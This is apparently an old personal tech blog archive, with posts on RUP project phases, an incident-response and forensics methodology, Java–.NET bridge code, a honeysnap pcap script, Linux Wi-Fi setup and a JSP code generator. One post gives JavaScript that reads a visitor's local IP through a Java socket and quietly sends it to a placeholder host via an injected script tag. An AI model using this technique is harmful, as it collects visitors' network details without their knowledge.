a. Understanding what to build is key, but determining how to build it and at what cost is also crucial. To determine whether you should continue with a project , you need to understand roughly how much the project will cost. Most of the costs are related to what resources you will need and how long it will take to complete the project. Combine all of this knowledge with an understanding of the required functionality and its value to the users, and you can build a Business case for the project. The business case documents the economic value of the product, expressing it in quantitative terms such as, for example, return on investment(ROI). The business case is the instrument that you use to obtain adequate project funding . It also outlines the major unmitigated risks and therefore the level of uncertainty that remains within the project.

b. If the budget has been set , then you determine what can be delivered within the budget and the schedule

9. Decide what process to follow and what tools to use

10. Project Review: Lifecycle Objective Milestone

a. The following evaluation criteria are included:

i. Stakeholder occurrence on scope definition and an initial cost/schedule estimate(which will be refined in later phases)

ii. Agreement that the right set of requirements have been captured and that there is a shared understanding of these requirements

iii. Agreement that the cost/schedule estimate priorities ,risks and development processes are appropriate

iv. Agreement that the initial risks have been identified and a mitigation strategy exists

b. The project maybe aborted or reconsidered if it fails to reach this milestone

The Above text is a brief description of the inception phase from the book "The RUP Made Easy, A practitioner's guide to the RUP" from Kroll and Kruchten

dotnetfromjava (3.5 month period) statistics (01-06-2007 - 12-09-2007)

2007-09-13T12:56:00.000+02:00

Some statistics since the launch of the dotnetfromjava.

approximatelly 1000 visits from 68 countries

First in usage is the USA with approximatelly 1/3 in downloads ...

The Other 2/3 are shared between the Europe (E.U.) and the rest of the world :)

From E.U. the First top 5 countries are

1. Germany
2. Greece
3. Spain
4. UK
5. France

The main *known* usage for dotnetfromjava is for google earth development from java.

Incident Preparation & Responce

2007-09-09T20:21:00.000+02:00

Incident Preparation(few words)

In order to complete the preparation for an incident , there should be a good knowledge of the following in advance:

Good knowledge of the OS that we administrate
Understanding of what we are protecting
Confirmation of securing all possible "entrances" (deamons/services)
Confirmation of defence preparation in all levels
Defence monitoring for early signs of an incident

The above should be supported by strct security policies as well as from strict firewall and Access Control Lists rules.

Incident Response

There is a part missing that analyses the tools that are needed for an incident(maybe in another blog).

In incident response we document our every move, so that the precess can be repeated, so that we can prove what was the process followed and that the process followes the international standards, in order to answer to a question in a court of law , etc...

The best way to collect and document evidences and at the same time avoiding any errors during the execution of a forensic analysis is via implementing the whole process as a methodology.

Researching the internet for such methodologies , I noticed that many sysadmins do not often have a specific procedure that follow in such cases.

Also , it has been identified that in a case of a successful break in, the administrator just reinstalls the operating system from a safe medium.

This move however , is bound to faiilure ...

Since there was no Root Cause Analysis, that is the reason that someone penetrated the system in order to secure it, then it is certain that it will happen again.

Also I have to mention that in the case where no forensics are applied to the system which was hacked, there are no proofs of what happened, how, when, from where and whom. Ussually this leads to estimations of what has happened to fill in the gap.

When we are gathering evidences in an incident we must ASSUME NOTHING.

Decisions should be taken based on facts and strong clues and evidences.

Unfortunately when we talk about security there is not such software or golden rule that will keep a system unbreakable...

EVery command and basically everything else that takes place in a system analysis shoudl be logged. Every command, with its exact parameters, should be logged for reasons of verification(if needed)

In this way , there is a log created that allows in anyone to follow your steps with detail

For example, instead of declaring : "Audit settings check", it should be declared as ,how did the check was done, including all the commands tht were used, their parameters, or even which GUIs where used.

Tools located on the suspect machine should NOT be trusted for obvious reasons. You should be use the equivalent programs from a secure read only medium.
During the incident response , you have to be very careful not to write anything on the suspect machine hard drive, but this can be subject to each company/organisation policy. If the purpose of this policy is to keep the integrity of the system while at the same time minimising its offline time, then nothing should be written on the hard drive and you should seek other ways to maintain and transfer of (to be collected) data.

Furthermore, it is important to know what appliciations, services are running on the system as well as what was its initialisation/configuration.
In this way we might spot easier suspect applications and services .

When we check/open any file on the system we alter their date(last accessed) destroying in this was valueable data.
During the initialisation of a system ,the best practices urge you to remove any unwanted and/or unused services as well as executable applications from the system.
Furthermore, the system should be fully patched and have proper security settings as well as proper security policies.
The steps that follow the suspect machine analysis are the following(documentation):

Current Date/Time and suspect machine date / time
connected users to the suspect machine
applications runnning per user
Analytically what resources is each application is using?
What libraries/modules are loaded
what ports are open by which application
what are their initialisation parameters and time that the applications is running
Network information, such as routing, connection statistics, ip , dns, dhcp, subnet
promiscuous mode detection.

-->Memory dumps(either per process or full memory dump)

-->HD Image(for analysis)

That was a methodology analysed :)
Do you think is not good? Do you have a better proposal? Let's discuss it...

First responders toolkit

2007-09-09T20:16:00.000+02:00

First responders toolkit

When it comes to professional security , the moto , nothing is secure is a must.

It is far better to plan ahead ... that is ,a step after security.

Because one way or another, someone better, or faster (yes there will always will be at least one guy ahead of you) than you, sooner or later is going to break in and if we are talking about enterprise security where the steaks are high then if you do not plan ahead you have lost the game! and who knows what else :)

So what is the next step after the proper security measures have been applied?

Obviously a toolkit and a methodology that in a case of an incident the system administrator will follow in order to save and log the important volatile data - that is until the forensic investigator comes in and takes over.

This process however, of the collection and storage of the volatile data, should be saved in a medium other than the hard drive since otherwise it may lead to destruction of digital evidences.

One issue when creating a first reponderer toolkit, is the problem with the DLLs dependencies with the forensic tools in windows.

Because windows source code is closed we cannot statically compile windows native executables. Therefore at a minimum we have to find out an application's footprint in memory and analyse it's dependencies by using a utility such as Filemon.

The issue with the DLLs is NOT as pressing in the UNIX world.
Since most of the operating systems are open source it is possible to statically build binaries that will not rely on shared libraries. This is the preferred type of tool because its output is more trustworthy.

Now regarding the methodology

1. Create a forensic tool testbed
2. Document the testbed

2.1 OS and S/W installed
2.2 Loaded DLLs (and a hash)
2.3 Types of H/W
2.4 Patches and hotfixes installed

3. Document and setup the forensic tools

3.1 Acuisition
3.2 Description
3.3 Functionality
3.4 Dependencies and system affects

4. Test the tools

As a first responderer, you should follow this methodology to ensure the integrity and reliability of each collection tool, command, or application you use in the field.

Greek Tragedy ...

2007-09-02T16:35:00.001+02:00

These Pictures are thousands of words....

Hobbies and vacations

2007-08-22T21:05:00.000+02:00

This vacations where the most relaxing ever...

I had it all...

happy and relaxing time by the sea with beautiful company

nice games of chess with a strong opponent's such as this ...

taking photos all day long such as the ones below (sunrise in Greece, Samos)

and ...

and a greek beach by sunset ...
what else can anyone ask? ...

More vacations :)

Google Earth From Java

2007-07-09T15:48:00.001+02:00

Dot Net from Java has published a google earth from java API.

Here is an example of opening google earth from java.

import gr.dotnetfromjava.base.*;

public class GE {

public static void main(String[] args) throws Exception {
// first we initialize the bridge.
NETManager.initialize();
// then we create the google earth application window
earthlib.ApplicationGEClass geApp = new earthlib.ApplicationGEClass();
// load a kml(Athens Traffic) file to display
geApp.OpenKmlFile(new NetString("c:\\Athens.kml"), new NetInt32());
// kill the bridge
NETManager.destroy();
}

}

Note , destroying the bridge will NOT close the google earth window.
You will have to close it manually.

Requirements to run the previous example :

1. Download and install Google Earth (4 or above)

2. "C:\Program Files\Google\Google Earth\googleearth.exe" /RegServer

3. TlbImp.exe "C:\Program Files\Google\Google Earth\googleearth.exe" /out:"C:\Program Files\Google\Google Earth\Interop.EARTHLib.dll"

4. Download from DotNetFrom Java website the following files:

dotnetfromjava.jar
dotnetfromjava.dll
GoogleEarthLib.jar
5. Download the GE.java compile it and run.

You should see something like the following:

DotNetfromJava

2007-06-22T19:21:00.000+02:00

.Net from java, Access any .NET Object and invoke any of its members via reflection

The intended purpose of this software API is to provide access to the .NET APIs, widening in this way the available java APIs. (For the moment is available only for windows systems)

To start development using dotnetfromjava you need the gr.dotnetfromjava.cpp.dll and dotnetfromjava.jar binaries.

Then after these files are addded to your project you have to initialize the dotnetfromjava native bridge. This can be done with the following method call:

NETManager.initialize();

When the bridge is initialized it pins the .NET Objects to the memory so that they will NOT get garbage collected. Because of the above restriction you have to initalize the bridge before you invoke any method and destroy it after you have finished with your .NET Invocations.

After you finish with all the native calls you can release any native resources that are beign held with the following method call

int res = NETManager.destroy();
// if (res==0) success
// else failure

By releasing a java object , it will also release its peer resources its from the dotnetfromjava registry and will eventually garbage collected from the .NET GC.

After we create the bridge we can create any .Net Object by passing the appropriate arguments to the NetObject constructor.

Examples:

NetObject dotnetObject = new NetObject("mscorlib.dll","System.Object");

NetObject customObject =
new NetObject("C:\\","my.dll","my.full.namespace.object",
new NetObject[]{dotnetObject});
After we create an .NEtObject we can invoke any method in that object via one of the following method calls:

# invokeSetMethod
# invokeGetMethod
# invokeSetProperty
# invokeGetProperty
# invokeSetField
# invokeGetField

All of the above methods are overloaded. You can invoke a member with just its name and its parameters (if any).

ie. (Windows Form creation and method invocation)

NetObject form = new NetObject("System.Windows.Forms.dll",
"System.Windows.Forms.Form");

form.invokeSetMethod("set_Text", new NetObject[]{new NetString("Form bar Text")});
The aforementioned method invocations exist similarly for static methods.
A static method can be invoked via the following way.

NetObject.invokeStaticSetMethod("mscorlib.dll", "System.Console", "WriteLine",new
NetBase[]{new NetString("Tsa...")});

For further documentation and examples you may view the javadocs and/or the examples subpackage as well as the official dotnetfromjava website

.NetfromJava provides also a sample .Net2java code geberator for extracting classs out of the assemblies

Interesting Java Related Scripting languages

2007-03-16T08:08:00.000+01:00

While I was searching for digital forensics and honeynets I started looking for an automated way to do administrative tasks.

However , I wanted scripting shell that would be object oriented(at least for most of my tasks) , ideally would provide me direct access to the core Java API and would give me all the shell power that i needed.

The first choice that popped up was the linux shell (not object oriented though )which is powerful. However as I said before my preference laid upon a java like shell.

First I found jsh , haven't tried it yet.
Then I found out jython a powerful java - python bridge (which I found out to nearly what I wanted) and also found very useful in many occasions and last but not least I found the One that it is my favourite the Java Bean Shell.

You can execute scripts from the command line like you would execute any other shell script.

Here is an example that lists log files in pcap directory and passes all files recursively to honeysnap for further analysis

script name : list.sh
#!/usr/bin/env bsh //indicates the shell to be used

java.io.File homedir = new
java.io.File(System.getProperties().getProperty("user.home")); //get the user home dir
hdir = homedir.getAbsolutePath()+"/pcapLogAnalysis";
mhdir="mkdir "+hdir; //string concat

exec(mhdir); //create subdir
if (bsh.args.length == 0) { //check for commandline arguments
hSnapParm = "--all-flows";
}
else {
hSnapParm = bsh.args[0];
}
java.io.File pcaps = new java.io.File("/var/log/pcap"); //default pcap dir
java.io.File[] pcapdirs = pcaps.listFiles();// get files & directories
for ( eachpcapdir : pcapdirs ) { //for each pcap dir
java.io.File[] logs = eachpcapdir.listFiles(); //list log files
for ( eachlog : logs ) { //for each log
if (eachlog.getAbsolutePath().endsWith("log")){
java.io.File parent = new
java.io.File(eachlog.getParent());
exec("mkdir "+parent.getAbsolutePath());

cmd="honeysnap -H10.0.0.10,10.0.0.20 "+
hSnapParm+" "+
eachlog.getAbsolutePath()+ " -o "+hdir+"/"+parent.getName()+" -f "+hdir+"/"+parent.getName()+"/analysis.txt";
exec(cmd);
print(cmd);
}
}
}
exec("tar -cjf "+homedir.getAbsolutePath()+"/analysis.tar.bz2 "+homedir.getAbsolutePath()+"/pcapLogAnalysis -C "+homedir.getAbsolutePath());

Linux Wireless Lan Setup for ACER aspire series

2006-10-12T18:17:00.000+02:00

This article has been tested with OpenSuSE 10.1 and acer aspire 5024 wlmi.

Impressions

The installation of open suse 10.1 left me wondering why do people do not use it more.
Setup was by far the easiest I have ever used.

OpenSuSE10.1 found nearly all of my laptop´s hardware at once without any requirement for configuration. The time that was spent for the setup & (auto)configuration of itself took less time than ussually windows require and without the requirement to install the drivers manually.

Of course as I mentioned above opensuse 10.1, did not found everything.

Support for my laptop´s wireless card and card reader was not there.

Below I will exaplain in a few and easy steps how to setup your wireless card (provided that you have an acer aspire 5020 series laptop or a compatible wireless card , such as fujitsu-siemens amilo series) You can check for your card compatibility at acerhk website

My Wireless card information

Vendor :Broadcom
device spec :aspire 3022 wlmi
device :bcm4318 airforce one 54g
model :ambit mcrosystem

Wireless card installation prerequisites

You will need your windows XP driver (on my laptop bcmwl5.inf) and you have to have root access.
After you find the windows driver , you will need the following to proceed:

ndiswrapper (installed by default)
acerhk
(you may also find useful acer_acpi and wlan-button but they are NOT required)

after you download and install ndiswrapper (using yast2 or rpm -ivh package-name for ndiswrapper)
you have to register your windows driver on linux.

You can do that by issuing the command : ndiswrapper -i driverfn.inf

you can verify the installation using ndiswrapper -l
(on successfull installation you should get something like the following)
/usr/sbin/ndiswrapper -l
Installed drivers:
bcmwl5 driver installed, hardware present
bcmwl5a driver installed, hardware present

After a successfull driver installation you can generate the configuration files for modprobe using ndiswrapper -m

Now you can configure your wireless card using /sbin/yast2 lan &
It appears a screen asking you to choose a method between ifup and NetworkManager
(My choice was network manager)

The next screen provides you with three options add/edit/delete network device
If you already have added a wireless network card you can edit it otherwise you can create a new one.

after pressing Add you should set Device type to Wireless
and module name should contain only ndiswrapper as this is the driver for your wireless card.
You should have not checked any of the checkboxes and the options field should be empty.

On the next screen go to the general tab and check the box user controlled and device activation on hotplug.

The firewall zone and address are up to you.
The next and final screen is again up to you since it expects information for the typical wireless configuration like the mode of the wireless card (ad-hoc,managed etc) , security (wep, wpa etc)

After the completion of the wizard acerhk( acer hot key driver) has to be compiled and installed

The acerhk tarball can be unzipped and untarred using
tar zxvf module-name .tag.gz
and then compile it and install it using:

make
make install

After the compilation acerhk has to be imported as kernel module
You can do this using the following command:

modprobe acerhk usedritek=1 autowlan=1

Ok, now when you press your wireless button your wireless card will work as if you were working with windows.

Now the only thing that remains to be done is to load the driver at system startup. You can achieve that by editing boot.local using a command like the folowing:
kedit /etc/init.d/boot.local append modprobe acerhk usedritek=1 autowlan=1 and you're set

Interesting stories & articles

2006-09-07T05:57:00.000+02:00

gmail hacktips

linux-ntfs

developing-with-facelets-jsf-jsp

experiments-in-streaming-java-me

JBoss web services manual

MySQL2JSP review in Japanese & English translated with google

Virtual Interfaces

How to find & evaluate client's ip using javascript

2006-09-01T05:34:00.000+02:00

Starting this week a friend, a developer himself, asked me if I could help him to develop a logging utility or a detailed counter for his personal website. In other words he wanted to know how many web visits he accepts per day and from where.

When he saw my surprised look he added that we could only use HTML/javascript to retrieve the client ip.

I had read on the internet that you can easily get the client's ip using javascript.
Since I only have basic knowledge of javascript, I thought that it would be better to
search on the internet and find a way to do it.

All I cound find was that you can use a script like the following:

< script language="javascript">
var ip = ''
...
< /script>

Of course the above script will not work since '' tag is actually SSI( Server Side Include)and has nothing to do with javascript.

Javascript does not provide a way to get the client's ip from the http "remote_addr" header. After all Javascript lies on the client-side.
I continued seaching and finally I found out at gnucitizen that you can find the client's ip address with javascript using the following script:

< script language="javascript" type="text/javascript">
var Client.getAddressInfo = function () {
var hostname = undefined;
var address = undefined;

try {
var sock = new java.net.Socket();
sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port));
hostname = sock.getLocalAddress().getHostName();
address = sock.getLocalAddress().getHostAddress();
} catch (e) {}

return {hostname: hostname, address: address};
};
< /script>

The above javascript will not find the client's ip address from the header, but will get the job done in most cases.

Due to the fact that javascript was our only solution, it quickly became evident that we should send the client's ip parameter elsewhere and manipulate it there.

The next issue I thought of, was how could the hostname be evaluated before the html page executes at the client browser. Failure to evaluate the hostname before the html parsing from the browser, means that instead of sending the client's ip, the script itself would be sent as a parameter.

The solution to this problem was found at dhtmlcentral
and is as follows:

function loadContent(file){
var head = document.getElementsByTagName('head').item(0)
var scriptTag = document.getElementById('loadScript');
if(scriptTag) head.removeChild(scriptTag);
script = document.createElement('script');
script.src = file;
script.type = 'text/javascript';
script.id = 'loadScript';
head.appendChild(script)
}

The above function is equal as writing
< SCRIPT LANGUAGE="JavaScript" RC="hostname/scriptname">< /SCRIPT>.

So if we execute a function that generates the SRC url and pass that function as a parameter to loadContent, we could dynamically invoke the specific url we want to use while sending the parameter we want at the same time.

The following example:

function gethost(){
return "http://somehost.com/pathTo/webPage?clientip="+Client.getAddressInfo().address;

};
loadContent(gethost());

would get the job done.

Finally, the joy of completion. Now If we could only find a way to convert that ip into country names we could generate various interesting statistics.

For example, if we were a company and we saw that certain percentage of our visits comes from a specific country, then we could reasses our overall strategy or our strategy regarding that country.

A possible way of converting the hostname into coutry name using PHP can be found at weberdev

MySQL to JSP Code Generator -- MySQL2JSP release 0.3.0.1

2006-08-27T12:15:00.001+02:00

MySQL2JSP is an easy to use, quick & template driven JSP code generator that creates a full set of JSP pages,
Servlets as well as JavaBeans from MySQL database using JDBC. Using the generated JSPs, users can perform any operation on any database record.

The MySQL2JSP project, has released version 0.3.0.1. This is primarily a template GUI enhancement release, but also contains several bugfixes of the templates as well as the code being developed. It generates a complete set of pages of Web application and displays foreign keys values. This release contains also several bugfixes of the templates as well as the code being developed.
Furthermore MySQL2JSP generates a complete directory structure of the web application.

Project Scope & Goals

The Scope of this application is to generate highly optimized code by leveraging other open source projects (such as velocity for the moment). MySQL2JSP will provide means, to other applications, of accessing the database through JDBC without requiring writing code. The generated code will comprise of a full set of servlet / JSP pages.

These pages should be produced the easiest way possible by reducing the configuration complexity on the one hand while producing clean & reusable amounts of code on the other. The generated code should also, be optimized while at the same time the produced code should remain as much reusable and customizable as possible in order to help to speed up the development cycle/process.

At the moment the MySQL2JSP code generator supports only MySQL but in future releases it will support other databases too.
Moreover, a set of javabeans is generated which complies with the java naming Furthermore, the application generates code that covers both the front end such as, the forms for each table as well as the logic that will manipulate the tables of the database, allowing users to perform any operation on any database record.

Finally, this application is NOT supposed to be a competitor of HIBERNATE or any other similar ORM. Instead, MySQL2JSP is supposed to be the small “cousin”, of ORM related products, that will be used for small/small-medium databases.

related links:

A MySQL2JSP brief tutorial

MySQL2JSP Future development ideas

More screenshots